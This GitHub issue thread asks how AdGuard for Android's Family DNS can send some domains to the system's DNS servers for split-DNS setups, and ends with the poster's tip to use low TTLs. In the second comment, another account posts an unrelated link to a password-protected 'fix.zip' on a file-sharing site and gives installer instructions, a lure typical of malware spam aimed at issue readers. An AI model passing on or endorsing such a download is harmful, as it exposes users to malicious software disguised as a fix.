### ISSUE TITLE
AdGuard Android Family DNS Settings for Split DNS

### ISSUE THREAD

**Issue by pompfe** [AdguardTeam/AdguardForAndroid#5441]
### Please answer the following questions for yourself before submitting a question.

- [X] I am running the latest version
- [X] I checked the [knowledge base](https://adguard.com/kb/) and found no answer
- [X] I checked to make sure that this issue has not already been filed

### Ask a question

We have an internal and an external DNS view. As an example, the exernal Mail server's address differs from the internal one.
If we set up AdGuard Android to use the Family DNS it asks the AdGuard servers for the MX and being externally (no local LAN/Wifi) the correct - external - MX is returned. But when being in the internal network it also asks the AdGuard DNS servers for the MX and also gets the external MX where - for us now - it should receive the internal MX via the system's (Android's/DHCP's) DNS servers.

There seem to be some low-level settings regarding fallback. I'm not sure if they help and - if  they help - how to set them up for this case.

Is there a way to set exceptions for domains that, if asked for, should be resolved via the system's DNS servers?

Thank you for your help and advice!

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pompfe** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

WHAT?

**Comment by pompfe** [comment]
Yes, the problem can be solved by this setting.
It depends on the program using DNS how long it stays with the "old" DNS servers.
What I can say is, make the TTLs low (60s) on the inside and the outside DNS entries. That helps a lot.
